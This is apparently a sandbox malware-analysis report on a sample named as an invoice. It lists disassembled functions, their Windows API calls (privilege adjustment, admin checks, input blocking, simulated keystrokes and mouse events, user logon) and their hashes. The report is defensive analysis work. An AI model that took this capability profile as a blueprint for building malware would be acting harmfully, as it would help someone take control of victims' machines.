                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                              • String ID:
                                                              • API String ID: 599397726-0
                                                              • Opcode ID: e5ac007f7a305b4c6026da06c77b1a7a89f287e811c2a0b36f40d848324f3d4a
                                                              • Instruction ID: 8ef07a9618228c5945ab7d1200eea17a4fca9f735daf6ce1578afe1c33fea8b6
                                                              • Opcode Fuzzy Hash: e5ac007f7a305b4c6026da06c77b1a7a89f287e811c2a0b36f40d848324f3d4a
                                                              • Instruction Fuzzy Hash: 97410A7552460ABFEB24DE80DC85FBFB7BCEF40714F10002AF60566581DAB19E559A50
                                                              Function 001F77B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: \Q*
                                                              • API String ID: 4104443479-3808209669
                                                              • Opcode ID: fc2455ef866def7644ed70e4df5bf030dbfaf219b58e52a692130cfed5f724c4
                                                              • Instruction ID: 8d3810607e87229a066de0f933f2679a0993d88fe0c981586101395273b8e46a
                                                              • Opcode Fuzzy Hash: fc2455ef866def7644ed70e4df5bf030dbfaf219b58e52a692130cfed5f724c4
                                                              • Instruction Fuzzy Hash: 5AA25C70D1421ACFDB28CF58C4806ADBBB1FF48314F2681A9D959AB391D7709E91DF90
                                                              Function 0023E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0023E20D
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0023E267
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0023E2B4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1682464887-0
                                                              • Opcode ID: f757fabfa9bea00eac082a022a752ae0bcd87f69dc7ce352ad522411ce842264
                                                              • Instruction ID: 541c3c550e8a0291f484395f25dfadd2ffb84752c4bcabe39b43ae68b97e2235
                                                              • Opcode Fuzzy Hash: f757fabfa9bea00eac082a022a752ae0bcd87f69dc7ce352ad522411ce842264
                                                              • Instruction Fuzzy Hash: EF216075A10218EFDB00EFA5D884EAEFBB8FF48310F0584AAE905A7251DB319955CF50
                                                              Function 0022B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020F4EA: std::exception::exception.LIBCMT ref: 0020F51E
                                                                • Part of subcall function 0020F4EA: __CxxThrowException@8.LIBCMT ref: 0020F533
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0022B180
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0022B1AD
                                                              • GetLastError.KERNEL32 ref: 0022B1BA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1922334811-0
                                                              • Opcode ID: 5f1d59fce1fe73c5d3b77863da153018f96ebd3ed97ba8d2ea44219850d60dd7
                                                              • Instruction ID: 17bc38e7c610204a9697d7995630f14f2c1ef590e362c1b16784053b386a8ead
                                                              • Opcode Fuzzy Hash: 5f1d59fce1fe73c5d3b77863da153018f96ebd3ed97ba8d2ea44219850d60dd7
                                                              • Instruction Fuzzy Hash: CC11BFB1424305BFE7289F94EC85D2BB7BCEF44710B20852EE45A97641EB70FC518A60
                                                              Function 00236606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00236623
                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00236664
                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0023666F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                              • String ID:
                                                              • API String ID: 33631002-0
                                                              • Opcode ID: 3a588d0c3d2318968dee24657ce461757e2feb0edb274033eaace25ff22f007e
                                                              • Instruction ID: f11ba18c65ffa8882b334299bf500ee5c6488e49ca0afaa1e9d8b813e237d9c1
                                                              • Opcode Fuzzy Hash: 3a588d0c3d2318968dee24657ce461757e2feb0edb274033eaace25ff22f007e
                                                              • Instruction Fuzzy Hash: 811152B1E11228BFDB108F94DC45BAE7BBCEB45750F108151F914E6290D3B05A018BA1
                                                              Function 002371FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00237223
                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0023723A
                                                              • FreeSid.ADVAPI32(?), ref: 0023724A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                              • String ID:
                                                              • API String ID: 3429775523-0
                                                              • Opcode ID: c681ce9b9077216aa172a6296a87c56cd8660f91316ed5aa6d658f528aad1dad
                                                              • Instruction ID: 8a4304632b218afe9cc957e28d9fd380c604321188c2aaf48cc97abb30f7897a
                                                              • Opcode Fuzzy Hash: c681ce9b9077216aa172a6296a87c56cd8660f91316ed5aa6d658f528aad1dad
                                                              • Instruction Fuzzy Hash: D3F01D7AA14219FFDF04DFE4DD99EEEBBB8EF08301F105469A606E2191E2709A448B10
                                                              Function 0023F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0023F599
                                                              • FindClose.KERNEL32(00000000), ref: 0023F5C9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 6fdc8f08420a4ad4b7c092d8f2f6734ce2cb5210970f367301fdc71bc19716b0
                                                              • Instruction ID: e42117602dd1033bb2b4764aada9325b8271ab947f11e423fd9cf3d56a17ee3f
                                                              • Opcode Fuzzy Hash: 6fdc8f08420a4ad4b7c092d8f2f6734ce2cb5210970f367301fdc71bc19716b0
                                                              • Instruction Fuzzy Hash: 8811C0726102009FD700EF28D849A2EB3E8FF95324F00892EF8A9D7291DB30AD148F81
                                                              Function 0023CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0024BE6A,?,?,00000000,?), ref: 0023CEA7
                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0024BE6A,?,?,00000000,?), ref: 0023CEB9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 0cfb6e83448ef0076b31b289e7334820bd6d563b08381e0ca4f8ed0b28dec69f
                                                              • Instruction ID: 9d82b8451d63fae59e7abdc1a1d95677bbef4242b44dfc816e5e04264705e666
                                                              • Opcode Fuzzy Hash: 0cfb6e83448ef0076b31b289e7334820bd6d563b08381e0ca4f8ed0b28dec69f
                                                              • Instruction Fuzzy Hash: 39F0827111422DABDB109FA4DC49FEA77ADBF08361F004165F919E6181D7709A50CBA0
                                                              Function 0023411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00234153
                                                              • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00234166
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: InputSendkeybd_event
                                                              • String ID:
                                                              • API String ID: 3536248340-0
                                                              • Opcode ID: 14013d39128210fb6f6051c36cbb03b1b3b814a5596eb7447fe5d2b6becf2d8e
                                                              • Instruction ID: af0e91f33bb36dea277e6f7ced380d7bd3c7a614eca13f9bd65c258038edaa98
                                                              • Opcode Fuzzy Hash: 14013d39128210fb6f6051c36cbb03b1b3b814a5596eb7447fe5d2b6becf2d8e
                                                              • Instruction Fuzzy Hash: EFF0907081034DAFDB059FA1C809BBE7FB0EF00305F008049F969A6191D779D652DFA0
                                                              Function 0022AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0022ACC0), ref: 0022AB99
                                                              • CloseHandle.KERNEL32(?,?,0022ACC0), ref: 0022ABAB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                              • String ID:
                                                              • API String ID: 81990902-0
                                                              • Opcode ID: 00ceaa6401244b9084aa9930c90c9836ea5a29cff42bab2a60cdd6d1957830e8
                                                              • Instruction ID: 282780b3b506d2815288a66ba37df7d2007e028fb74b76a9d4bee197f0cd6803
                                                              • Opcode Fuzzy Hash: 00ceaa6401244b9084aa9930c90c9836ea5a29cff42bab2a60cdd6d1957830e8
                                                              • Instruction Fuzzy Hash: B8E0BF71014611AFE7652F54FD09D767BA9EF043207508469B45A81871D7625DA0DB50
                                                              Function 002181AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00216DB3,-0000031A,?,?,00000001), ref: 002181B1
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002181BA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 2be16bb292c50aa6311cb821f648fbd3cdbf1444fd99e4cefa2eef6fdfa9ce6b
                                                              • Instruction ID: 9e7709f79355b6ef4d410d60273edfc1e0c4011b79cf61a537148a918031e0ad
                                                              • Opcode Fuzzy Hash: 2be16bb292c50aa6311cb821f648fbd3cdbf1444fd99e4cefa2eef6fdfa9ce6b
                                                              • Instruction Fuzzy Hash: 0CB09231084608ABDB002BA1FC0EB587FB8EF08662F004090F60D480618B7254908EA2
                                                              Function 0021D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6516d51dc57f4779a7fb05df783e8756075b3a77d138565ff1cf16dbb9e6cce6
                                                              • Instruction ID: 6e3d093bc45aa83d0e1493a89d0033d1bfa9742fe9de5f25523dd2a4f5c4f422
                                                              • Opcode Fuzzy Hash: 6516d51dc57f4779a7fb05df783e8756075b3a77d138565ff1cf16dbb9e6cce6
                                                              • Instruction Fuzzy Hash: C5320435D39F018DDB239635D926336A28CAFB73D4F15D727E819B59AAEB29C4C34200
                                                              Function 001F96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf
                                                              • String ID:
                                                              • API String ID: 674341424-0
                                                              • Opcode ID: edf157cfe886cf97b9cddd19b3b08f4dbf527b64978d03cf4f7b49da1d5e4c9c
                                                              • Instruction ID: 480292b063ffb25e08f1924257eb7514a786e08acfd7f82b7334355a53a1b9fd
                                                              • Opcode Fuzzy Hash: edf157cfe886cf97b9cddd19b3b08f4dbf527b64978d03cf4f7b49da1d5e4c9c
                                                              • Instruction Fuzzy Hash: 1E2289716183059FD724EF24C891B6BB7E4BF84310F11491EFA9A97291DB71E944CF82
                                                              Function 0022038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64b2678782e17dafa24d83098c5e04a6b31395dde0e5153688569f53740dbd9f
                                                              • Instruction ID: b44aaf62d31fdafbacd7515a62959439b98cb1da4f47c07fe6dcd4758c5cd66c
                                                              • Opcode Fuzzy Hash: 64b2678782e17dafa24d83098c5e04a6b31395dde0e5153688569f53740dbd9f
                                                              • Instruction Fuzzy Hash: CEB11334D2AF614DD3239638A875336B65CAFBB2D5F91D71BFC1A70D22EB2185834280
                                                              Function 0023B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __time64.LIBCMT ref: 0023B6DF
                                                                • Part of subcall function 0021344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0023BDC3,00000000,?,?,?,?,0023BF70,00000000,?), ref: 00213453
                                                                • Part of subcall function 0021344A: __aulldiv.LIBCMT ref: 00213473
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                              • String ID:
                                                              • API String ID: 2893107130-0
                                                              • Opcode ID: c546a22755647b284d3408b2fe76d53be42415bc0ffdb1bac2225db6bcd868dd
                                                              • Instruction ID: 49dad183c466f2649c9ca723f8b25a9aab27d7403436998257990b4ed8416d6f
                                                              • Opcode Fuzzy Hash: c546a22755647b284d3408b2fe76d53be42415bc0ffdb1bac2225db6bcd868dd
                                                              • Instruction Fuzzy Hash: 7921A2726345108BC72ACF28D881A92F7E5EB95310B248E6DE0E5CB2C0CB74B955CF94
                                                              Function 00246AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • BlockInput.USER32(00000001), ref: 00246ACA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BlockInput
                                                              • String ID:
                                                              • API String ID: 3456056419-0
                                                              • Opcode ID: b091108606754323a66e65b74f1c794cda056a66207279ff9d81b5823938253d
                                                              • Instruction ID: a26a2ccd29061004e7c0a5deb761389dcb19f09cef5f30030771c831bf694a14
                                                              • Opcode Fuzzy Hash: b091108606754323a66e65b74f1c794cda056a66207279ff9d81b5823938253d
                                                              • Instruction Fuzzy Hash: 17E0D835210214AFD700EF59E408D56B7EDAF74751F04C417F909D7291CAB0F8048B91
                                                              Function 002374BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002374DE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID:
                                                              • API String ID: 2434400541-0
                                                              • Opcode ID: afbe8d68f8b276e42807a2bd93d2516f786cc1f5a226106c9e2676f261cddd48
                                                              • Instruction ID: ed56c09a52d45ef6b663b655aa299314cef3af60ab5b75f44da1021e752c5f9f
                                                              • Opcode Fuzzy Hash: afbe8d68f8b276e42807a2bd93d2516f786cc1f5a226106c9e2676f261cddd48
                                                              • Instruction Fuzzy Hash: 83D05EE017C30639EC381B249C0FF764968F3007C0FC0818AB382C90C3B8C078619132
                                                              Function 0022B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0022AD3E), ref: 0022B124
                                                              Memory Dump Source
